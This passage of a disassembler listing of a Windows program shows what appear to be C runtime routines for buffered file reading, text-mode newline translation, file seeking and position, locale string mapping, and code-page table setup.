loc_41E161: ; CODE XREF: sub_41D797+9B8�j
mov al, [esi]
test al, al
jnz loc_41D7C1
jmp short loc_41E19D
; ---------------------------------------------------------------------------
loc_41E16D: ; CODE XREF: sub_41D797+1F4�j
; sub_41D797+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_41E17D
; ---------------------------------------------------------------------------
loc_41E178: ; CODE XREF: sub_41D797+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_41E17D: ; CODE XREF: sub_41D797+9DF�j
call sub_41E20D
pop ecx
pop ecx
jmp short loc_41E19D
; ---------------------------------------------------------------------------
loc_41E186: ; CODE XREF: sub_41D797+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_41E20D
dec [ebp+var_4]
push edi
push ebx
call sub_41E20D
add esp, 10h
loc_41E19D: ; CODE XREF: sub_41D797+1F�j
; sub_41D797+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41E1B4
loc_41E1A3: ; CODE XREF: sub_41D797+9BD�j
; sub_41D797+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_41E1B7
cmp [ebp+var_15], al
jnz short loc_41E1B7
or eax, 0FFFFFFFFh
jmp short loc_41E1B7
; ---------------------------------------------------------------------------
loc_41E1B4: ; CODE XREF: sub_41D797+A0A�j
mov eax, [ebp+var_34]
loc_41E1B7: ; CODE XREF: sub_41D797+A11�j
; sub_41D797+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41D797 endp
; =============== S U B R O U T I N E =======================================
sub_41E1BC proc near ; CODE XREF: sub_41D797+7A3�p
; sub_41D797+8DC�p
arg_0 = dword ptr 4
cmp ds:dword_433E7C, 1
push esi
jle short loc_41E1D6
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_41A642
pop ecx
pop ecx
jmp short loc_41E1E5
; ---------------------------------------------------------------------------
loc_41E1D6: ; CODE XREF: sub_41E1BC+8�j
mov esi, [esp+4+arg_0]
mov eax, ds:off_433C70
mov al, [eax+esi*2]
and eax, 4
loc_41E1E5: ; CODE XREF: sub_41E1BC+18�j
test eax, eax
jnz short loc_41E1EF
and esi, 0FFFFFFDFh
sub esi, 7
loc_41E1EF: ; CODE XREF: sub_41E1BC+2B�j
mov eax, esi
pop esi
retn
sub_41E1BC endp
; =============== S U B R O U T I N E =======================================
sub_41E1F3 proc near ; CODE XREF: sub_41D797+1E1�p
; sub_41D797+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_41E205
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_41E205: ; CODE XREF: sub_41E1F3+7�j
push edx
call sub_41E248
pop ecx
retn
sub_41E1F3 endp
; =============== S U B R O U T I N E =======================================
sub_41E20D proc near ; CODE XREF: sub_41D797+6B�p
; sub_41D797+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_41E223
push [esp+arg_4]
push [esp+4+arg_0]
call sub_420FAF
pop ecx
pop ecx
locret_41E223: ; CODE XREF: sub_41E20D+5�j
retn
sub_41E20D endp
; =============== S U B R O U T I N E =======================================
sub_41E224 proc near ; CODE XREF: sub_41D797+63�p
; sub_41D797+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_41E22A: ; CODE XREF: sub_41E224+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_41E1F3
mov edi, eax
push edi
call sub_420F60
pop ecx
test eax, eax
pop ecx
jnz short loc_41E22A
mov eax, edi
pop edi
pop esi
retn
sub_41E224 endp
; =============== S U B R O U T I N E =======================================
sub_41E248 proc near ; CODE XREF: sub_418A86+A9�p
; sub_41900C+2D�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_41E31C
test al, 40h
jnz loc_41E31C
test al, 2
jz short loc_41E26E
or al, 20h
mov [esi+0Ch], eax
jmp loc_41E31C
; ---------------------------------------------------------------------------
loc_41E26E: ; CODE XREF: sub_41E248+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41E282
push esi
call sub_41F9D8
pop ecx
jmp short loc_41E287
; ---------------------------------------------------------------------------
loc_41E282: ; CODE XREF: sub_41E248+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_41E287: ; CODE XREF: sub_41E248+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41E321
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_41E30B
cmp eax, 0FFFFFFFFh
jz short loc_41E30B
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_41E2E0
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_41E2C9
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, ds:dword_4CECE0[edi*4]
lea edi, [edi+ecx*8]
jmp short loc_41E2CE
; ---------------------------------------------------------------------------
loc_41E2C9: ; CODE XREF: sub_41E248+6B�j
mov edi, offset dword_4362F0
loc_41E2CE: ; CODE XREF: sub_41E248+7F�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_41E2E0
or dh, 20h
mov [esi+0Ch], edx
loc_41E2E0: ; CODE XREF: sub_41E248+62�j
; sub_41E248+90�j
cmp dword ptr [esi+18h], 200h
jnz short loc_41E2FD
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_41E2FD
test ch, 4
jnz short loc_41E2FD
mov dword ptr [esi+18h], 1000h
loc_41E2FD: ; CODE XREF: sub_41E248+9F�j
; sub_41E248+A7�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E30B: ; CODE XREF: sub_41E248+55�j
; sub_41E248+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_41E31C: ; CODE XREF: sub_41E248+A�j
; sub_41E248+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_41E248 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E321 proc near ; CODE XREF: sub_418A86+90�p
; sub_41E248+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
cmp esi, ds:dword_4CEDE0
jnb loc_41E4FE
mov eax, esi
and esi, 1Fh
sar eax, 5
shl esi, 3
lea ebx, ds:4CECE0h[eax*4]
mov eax, ds:dword_4CECE0[eax*4]
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_41E4FE
and [ebp+var_8], 0
mov edi, [ebp+arg_4]
cmp [ebp+arg_8], 0
mov ecx, edi
jz short loc_41E3D6
test dl, 2
jnz short loc_41E3D6
test dl, 48h
jz short loc_41E396
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41E396
dec [ebp+arg_8]
mov [edi], al
mov eax, [ebx]
lea ecx, [edi+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41E396: ; CODE XREF: sub_41E321+56�j
; sub_41E321+5D�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [ebx]
push [ebp+arg_8]
push ecx
push dword ptr [eax+esi]
call ds:off_424074
test eax, eax
jnz short loc_41E3E9
call ds:dword_42408C ;; RtlGetLastWin32Error
push 5
pop ecx
cmp eax, ecx
jnz short loc_41E3D1
mov ds:dword_4CD9B4, 9
mov ds:dword_4CD9B8, ecx
jmp loc_41E50F
; ---------------------------------------------------------------------------
loc_41E3D1: ; CODE XREF: sub_41E321+99�j
cmp eax, 6Dh
jnz short loc_41E3DD
loc_41E3D6: ; CODE XREF: sub_41E321+4C�j
; sub_41E321+51�j
xor eax, eax
jmp loc_41E512
; ---------------------------------------------------------------------------
loc_41E3DD: ; CODE XREF: sub_41E321+B3�j
push eax
call sub_41EF44
pop ecx
jmp loc_41E50F
; ---------------------------------------------------------------------------
loc_41E3E9: ; CODE XREF: sub_41E321+8C�j
mov eax, [ebx]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_41E4F9
test edx, edx
jz short loc_41E40E
cmp byte ptr [edi], 0Ah
jnz short loc_41E40E
or al, 4
jmp short loc_41E410
; ---------------------------------------------------------------------------
loc_41E40E: ; CODE XREF: sub_41E321+E2�j
; sub_41E321+E7�j
and al, 0FBh
loc_41E410: ; CODE XREF: sub_41E321+EB�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_41E4F3
loc_41E428: ; CODE XREF: sub_41E321+1BA�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_41E4E3
cmp al, 0Dh
jz short loc_41E444
mov [edi], al
inc edi
inc [ebp+arg_8]
jmp loc_41E4D5
; ---------------------------------------------------------------------------
loc_41E444: ; CODE XREF: sub_41E321+116�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_41E462
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41E459
add [ebp+arg_8], 2
jmp short loc_41E4B7
; ---------------------------------------------------------------------------
loc_41E459: ; CODE XREF: sub_41E321+130�j
mov byte ptr [edi], 0Dh
inc edi
mov [ebp+arg_8], eax
jmp short loc_41E4D5
; ---------------------------------------------------------------------------
loc_41E462: ; CODE XREF: sub_41E321+127�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:off_424074
test eax, eax
jnz short loc_41E48A
call ds:dword_42408C ;; RtlGetLastWin32Error
test eax, eax
jnz short loc_41E4D1
loc_41E48A: ; CODE XREF: sub_41E321+15D�j
cmp [ebp+var_C], 0
jz short loc_41E4D1
mov eax, [ebx]
test byte ptr [eax+esi+4], 48h
jz short loc_41E4AC
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41E4B7
mov byte ptr [edi], 0Dh
mov ecx, [ebx]
inc edi
mov [ecx+esi+5], al
jmp short loc_41E4D5
; ---------------------------------------------------------------------------
loc_41E4AC: ; CODE XREF: sub_41E321+176�j
cmp edi, [ebp+arg_4]
jnz short loc_41E4BC
cmp [ebp+var_1], 0Ah
jnz short loc_41E4BC
loc_41E4B7: ; CODE XREF: sub_41E321+136�j
; sub_41E321+17D�j
mov byte ptr [edi], 0Ah
jmp short loc_41E4D4
; ---------------------------------------------------------------------------
loc_41E4BC: ; CODE XREF: sub_41E321+18E�j
; sub_41E321+194�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41E517
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_41E4D5
loc_41E4D1: ; CODE XREF: sub_41E321+167�j
; sub_41E321+16D�j
mov byte ptr [edi], 0Dh
loc_41E4D4: ; CODE XREF: sub_41E321+199�j
inc edi
loc_41E4D5: ; CODE XREF: sub_41E321+11E�j
; sub_41E321+13F�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41E428
jmp short loc_41E4F3
; ---------------------------------------------------------------------------
loc_41E4E3: ; CODE XREF: sub_41E321+10E�j
mov eax, [ebx]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_41E4F3
or al, 2
mov [esi], al
loc_41E4F3: ; CODE XREF: sub_41E321+101�j
; sub_41E321+1C0�j ...
sub edi, [ebp+arg_4]
mov [ebp+var_8], edi
loc_41E4F9: ; CODE XREF: sub_41E321+DA�j
mov eax, [ebp+var_8]
jmp short loc_41E512
; ---------------------------------------------------------------------------
loc_41E4FE: ; CODE XREF: sub_41E321+12�j
; sub_41E321+39�j
and ds:dword_4CD9B8, 0
mov ds:dword_4CD9B4, 9
loc_41E50F: ; CODE XREF: sub_41E321+AB�j
; sub_41E321+C3�j
or eax, 0FFFFFFFFh
loc_41E512: ; CODE XREF: sub_41E321+B7�j
; sub_41E321+1DB�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E321 endp
; =============== S U B R O U T I N E =======================================
sub_41E517 proc near ; CODE XREF: sub_418D0E+67�p
; sub_419D23+CD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, ds:dword_4CEDE0
push esi
push edi
jnb short loc_41E599
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:4CECE0h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_41E599
push eax
call sub_41FE32
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41E55B
mov ds:dword_4CD9B4, 9
jmp short loc_41E5AA
; ---------------------------------------------------------------------------
loc_41E55B: ; CODE XREF: sub_41E517+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call ds:off_4240C0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41E57B
call ds:dword_42408C ;; RtlGetLastWin32Error
jmp short loc_41E57D
; ---------------------------------------------------------------------------
loc_41E57B: ; CODE XREF: sub_41E517+5A�j
xor eax, eax
loc_41E57D: ; CODE XREF: sub_41E517+62�j
test eax, eax
jz short loc_41E58A
push eax
call sub_41EF44
pop ecx
jmp short loc_41E5AA
; ---------------------------------------------------------------------------
loc_41E58A: ; CODE XREF: sub_41E517+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_41E5AD
; ---------------------------------------------------------------------------
loc_41E599: ; CODE XREF: sub_41E517+D�j
; sub_41E517+2A�j
and ds:dword_4CD9B8, 0
mov ds:dword_4CD9B4, 9
loc_41E5AA: ; CODE XREF: sub_41E517+42�j
; sub_41E517+71�j
or eax, 0FFFFFFFFh
loc_41E5AD: ; CODE XREF: sub_41E517+80�j
pop edi
pop esi
pop ebx
retn
sub_41E517 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E5B1 proc near ; CODE XREF: sub_418D0E+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_41E5CD
mov [edi+4], ebx
loc_41E5CD: ; CODE XREF: sub_41E5B1+17�j
push 1
push ebx
push esi
call sub_41E517
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_41E63B
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_41E5F2
sub eax, [edi+4]
jmp loc_41E704
; ---------------------------------------------------------------------------
loc_41E5F2: ; CODE XREF: sub_41E5B1+37�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp+var_8], ebx
jz short loc_41E62C
mov edx, esi
mov ebx, esi
sar edx, 5
and ebx, 1Fh
mov edx, ds:dword_4CECE0[edx*4]
test byte ptr [edx+ebx*8+4], 80h
jz short loc_41E643
mov edx, ecx
loc_41E61D: ; CODE XREF: sub_41E5B1+79�j
cmp edx, eax
jnb short loc_41E643
cmp byte ptr [edx], 0Ah
jnz short loc_41E629
inc [ebp+var_8]
loc_41E629: ; CODE XREF: sub_41E5B1+73�j
inc edx
jmp short loc_41E61D
; ---------------------------------------------------------------------------
loc_41E62C: ; CODE XREF: sub_41E5B1+50�j
test dl, 80h
jnz short loc_41E643
mov ds:dword_4CD9B4, 16h
loc_41E63B: ; CODE XREF: sub_41E5B1+2D�j
or eax, 0FFFFFFFFh
jmp loc_41E704
; ---------------------------------------------------------------------------
loc_41E643: ; CODE XREF: sub_41E5B1+68�j
; sub_41E5B1+6E�j ...
cmp [ebp+var_4], 0
jnz short loc_41E651
mov eax, [ebp+var_8]
jmp loc_41E704
; ---------------------------------------------------------------------------
loc_41E651: ; CODE XREF: sub_41E5B1+96�j
test byte ptr [edi+0Ch], 1
jz loc_41E6FC
mov edx, [edi+4]
test edx, edx
jnz short loc_41E66A
and [ebp+var_8], edx
jmp loc_41E6FC
; ---------------------------------------------------------------------------
loc_41E66A: ; CODE XREF: sub_41E5B1+AF�j
sub eax, ecx
add eax, edx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:4CECE0h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [esi+eax+4], 80h
jz short loc_41E6F6
push 2
push 0
push [ebp+var_C]
call sub_41E517
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_41E6BD
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_41E6A8: ; CODE XREF: sub_41E5B1+104�j
cmp eax, ecx
jnb short loc_41E6B7
cmp byte ptr [eax], 0Ah
jnz short loc_41E6B4
inc [ebp+arg_0]
loc_41E6B4: ; CODE XREF: sub_41E5B1+FE�j
inc eax
jmp short loc_41E6A8
; ---------------------------------------------------------------------------
loc_41E6B7: ; CODE XREF: sub_41E5B1+F9�j
test byte ptr [edi+0Dh], 20h
jmp short loc_41E6F1
; ---------------------------------------------------------------------------
loc_41E6BD: ; CODE XREF: sub_41E5B1+ED�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_41E517
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41E6E4
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41E6E4
test ch, 4
jz short loc_41E6E7
loc_41E6E4: ; CODE XREF: sub_41E5B1+124�j
; sub_41E5B1+12C�j
mov eax, [edi+18h]
loc_41E6E7: ; CODE XREF: sub_41E5B1+131�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_41E6F1: ; CODE XREF: sub_41E5B1+10A�j
jz short loc_41E6F6
inc [ebp+arg_0]
loc_41E6F6: ; CODE XREF: sub_41E5B1+D9�j
; sub_41E5B1:loc_41E6F1�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_41E6FC: ; CODE XREF: sub_41E5B1+A4�j
; sub_41E5B1+B4�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41E704: ; CODE XREF: sub_41E5B1+3C�j
; sub_41E5B1+8D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41E5B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E709 proc near ; CODE XREF: sub_419063+47�p
; sub_419063+74�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4248E0
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_4CDA60, edi
jnz short loc_41E77F
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_4248D8
mov esi, 100h
push esi
push edi
call ds:dword_4241C8 ;; LCMapStringW
test eax, eax
jz short loc_41E75D
mov ds:dword_4CDA60, ebx
jmp short loc_41E77F
; ---------------------------------------------------------------------------
loc_41E75D: ; CODE XREF: sub_41E709+4A�j
push edi
push edi
push ebx
push offset dword_436EF4
push esi
push edi
call ds:dword_4241C4 ;; LCMapStringA
test eax, eax
jz loc_41E897
mov ds:dword_4CDA60, 2
loc_41E77F: ; CODE XREF: sub_41E709+2E�j
; sub_41E709+52�j
cmp [ebp+arg_C], edi
jle short loc_41E794
push [ebp+arg_C]
push [ebp+arg_8]
call sub_422467
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_41E794: ; CODE XREF: sub_41E709+79�j
mov eax, ds:dword_4CDA60
cmp eax, 2
jnz short loc_41E7BB
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C4 ;; LCMapStringA
jmp loc_41E899
; ---------------------------------------------------------------------------
loc_41E7BB: ; CODE XREF: sub_41E709+93�j
cmp eax, 1
jnz loc_41E897
cmp [ebp+arg_18], edi
jnz short loc_41E7D1
mov eax, ds:dword_4CDA58
mov [ebp+arg_18], eax
loc_41E7D1: ; CODE XREF: sub_41E709+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_424070 ;; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_41E897
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41E82C
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_41E82C: ; CODE XREF: sub_41E709+10E�j
cmp [ebp+var_24], edi
jz short loc_41E897
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_424070 ;; MultiByteToWideChar
test eax, eax
jz short loc_41E897
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C8 ;; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_41E897
test byte ptr [ebp+arg_4+1], 4
jz short loc_41E8AB
cmp [ebp+arg_14], edi
jz loc_41E926
cmp esi, [ebp+arg_14]
jg short loc_41E897
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C8 ;; LCMapStringW
test eax, eax
jnz loc_41E926
loc_41E897: ; CODE XREF: sub_41E709+66�j
; sub_41E709+B5�j ...
xor eax, eax
loc_41E899: ; CODE XREF: sub_41E709+AD�j
; sub_41E709+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41E8AB: ; CODE XREF: sub_41E709+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41E8DF
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_41E8DF: ; CODE XREF: sub_41E709+1C2�j
cmp ebx, edi
jz short loc_41E897
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C8 ;; LCMapStringW
test eax, eax
jz short loc_41E897
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_41E906
push edi
push edi
jmp short loc_41E90C
; ---------------------------------------------------------------------------
loc_41E906: ; CODE XREF: sub_41E709+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41E90C: ; CODE XREF: sub_41E709+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_424150 ;; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_41E897
loc_41E926: ; CODE XREF: sub_41E709+165�j
; sub_41E709+188�j
mov eax, esi
jmp loc_41E899
sub_41E709 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E92D proc near ; CODE XREF: sub_41ECF1+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41EAC6 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, ds:dword_4CEDE4
mov [ebp+arg_0], esi
jz loc_41EABA
xor ebx, ebx
cmp esi, ebx
jz loc_41EAB0
xor edx, edx
mov eax, offset dword_436010
loc_41E961: ; CODE XREF: sub_41E92D+41�j
cmp [eax], esi
jz short loc_41E9D7
add eax, 30h
inc edx
cmp eax, offset dword_436100
jl short loc_41E961
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_4241CC ;; GetCPInfo
cmp eax, 1
jnz loc_41EAA8
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4CEF00
cmp [ebp+var_18], 1
mov ds:dword_4CEDE4, esi
rep stosd
stosb
mov ds:dword_4CF004, ebx
jbe loc_41EA96
cmp [ebp+var_12], 0
jz loc_41EA6C
lea ecx, [ebp+var_11]
loc_41E9B4: ; CODE XREF: sub_41E92D+139�j
mov dl, [ecx]
test dl, dl
jz loc_41EA6C
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_41E9C5: ; CODE XREF: sub_41E92D+A8�j
cmp eax, edx
ja loc_41EA60
or ds:byte_4CEF01[eax], 4
inc eax
jmp short loc_41E9C5
; ---------------------------------------------------------------------------
loc_41E9D7: ; CODE XREF: sub_41E92D+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4CEF00
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_436020[esi]
loc_41E9F3: ; CODE XREF: sub_41E92D+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_41EA26
loc_41E9FA: ; CODE XREF: sub_41E92D+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_41EA26
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_41EA1F
mov edx, [ebp+var_4]
mov dl, ds:byte_436008[edx]
loc_41EA14: ; CODE XREF: sub_41E92D+F0�j
or ds:byte_4CEF01[eax], dl
inc eax
cmp eax, edi
jbe short loc_41EA14
loc_41EA1F: ; CODE XREF: sub_41E92D+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_41E9FA
loc_41EA26: ; CODE XREF: sub_41E92D+CB�j
; sub_41E92D+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_41E9F3
mov eax, [ebp+arg_0]
mov ds:dword_4CEDFC, 1
push eax
mov ds:dword_4CEDE4, eax
call sub_41EB10
lea esi, dword_436014[esi]
mov edi, offset dword_4CEDF0
movsd
movsd
pop ecx
mov ds:dword_4CF004, eax
movsd
jmp short loc_41EAB5
; ---------------------------------------------------------------------------
loc_41EA60: ; CODE XREF: sub_41E92D+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41E9B4
loc_41EA6C: ; CODE XREF: sub_41E92D+7E�j
; sub_41E92D+8B�j
push 1
pop eax
loc_41EA6F: ; CODE XREF: sub_41E92D+14F�j
or ds:byte_4CEF01[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_41EA6F
push esi
call sub_41EB10
pop ecx
mov ds:dword_4CF004, eax
mov ds:dword_4CEDFC, 1
jmp short loc_41EA9C
; ---------------------------------------------------------------------------
loc_41EA96: ; CODE XREF: sub_41E92D+74�j
mov ds:dword_4CEDFC, ebx
loc_41EA9C: ; CODE XREF: sub_41E92D+167�j
xor eax, eax
mov edi, offset dword_4CEDF0
stosd
stosd
stosd
jmp short loc_41EAB5
; ---------------------------------------------------------------------------
loc_41EAA8: ; CODE XREF: sub_41E92D+51�j
cmp ds:dword_4CDA64, ebx
jz short loc_41EABE
loc_41EAB0: ; CODE XREF: sub_41E92D+27�j
call sub_41EB43
loc_41EAB5: ; CODE XREF: sub_41E92D+131�j
; sub_41E92D+179�j
call sub_41EB6C
loc_41EABA: ; CODE XREF: sub_41E92D+1D�j
xor eax, eax
jmp short loc_41EAC1
; ---------------------------------------------------------------------------
loc_41EABE: ; CODE XREF: sub_41E92D+181�j
or eax, 0FFFFFFFFh
loc_41EAC1: ; CODE XREF: sub_41E92D+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E92D endp
; =============== S U B R O U T I N E =======================================
sub_41EAC6 proc near ; CODE XREF: sub_41E92D+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and ds:dword_4CDA64, 0
cmp eax, 0FFFFFFFEh
jnz short loc_41EAE6
mov ds:dword_4CDA64, 1
jmp ds:dword_424050
; ---------------------------------------------------------------------------
